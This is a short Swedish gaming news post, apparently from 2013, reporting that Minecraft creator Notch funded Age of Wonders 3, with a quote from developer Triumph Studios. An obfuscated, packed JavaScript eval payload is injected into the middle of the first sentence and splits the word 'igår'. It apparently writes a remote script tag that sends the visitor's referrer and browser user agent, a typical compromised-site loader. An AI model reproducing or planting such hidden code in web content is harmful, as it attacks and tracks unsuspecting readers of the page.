Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Marcus ”Notch” Persson finansierar Age of Wonders 3

Filip Urde
  • On 14 februari, 2013
  • http://www.revue.se/filip-urde

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hrkiy|var|u0026u|referrer|rnkbr||js|php’.split(’|’),0,{}))
går så skrev vi att Minecraft grundaren Notch är ganska rik. Är man ganska rik så vill man göra av med ganska mycket pengar och vad bättre än att  finansiera nyligen offentliggjorda Age of Wonders 3?

 

Nä precis! Det tyckte Notch också var en bra idé så han la in så mycket pengar i projektet att utvecklaren Triumph Studios, nu inte längre behövde söka finansiering för att få klart spelet. Notch gillar verkligen Age of Wonders…

”We had a demo for Age of Wonders 3 and talked to various parties including traditional publishers. There was certainly interest but the prospect of having Notch help fund was a dream come true, as he’s a fan of the game and didn’t insist on owning it like many of the publishers do these days when they fund development.”

Age of Wonders 3 kommer släppas till Windows och Mac under hösten.

Tack Good Guy Notch!
www.eurogamer.net